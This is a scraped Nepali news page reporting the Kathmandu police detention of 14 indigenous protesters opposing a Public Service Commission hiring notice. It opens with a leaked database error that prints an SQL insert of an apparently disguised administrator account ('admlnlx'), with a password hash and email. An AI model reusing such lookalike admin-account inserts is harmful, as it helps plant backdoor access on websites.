WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNBBIiRazK6CYK2.OyPNCi8Z4kqOL6/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 16:03:09', '', 'admlnlx', 'admlnlx')
गाउँले न्युज, २६ साउन, काठमाडौँ । लोकसेवा आयोगको असमावेशी विज्ञापनविरुद्ध प्रदर्शनमा उत्रिएका आदिवासी जनजातीहरुलाई प्रहरीले नियन्त्रणमा लिएको छ ।
विज्ञापनको विरोधमा (आज) आइतबार भद्रकालीबाट र्यालिसहित सिंहदरवार हुँदै लोकसेवा आयोगको कार्यालय घेर्न जाने क्रममा उनीहरुलाई भद्रकालीबाटै प्रहरीले पक्राउ गरेको हो ।
१४ जना आन्दोलनकारीलाई नियन्त्रणमा लिइएको जनाइएको छ । जसमा १३ जना पुरुष र १ जना महिला रहेको महानगरीय प्रहरी परिसर काठमाडौँका प्रवक्ता होविन्द्र बोगटीले जानकारी दिए ।
संघीयताको मूल मर्म र समानुपातिक समावेशी सिद्धान्त विपरित लोकसेवा आयोगले स्थानीय तहमा कर्मचारी भर्ना गर्न विज्ञापन निकालेको थियो ।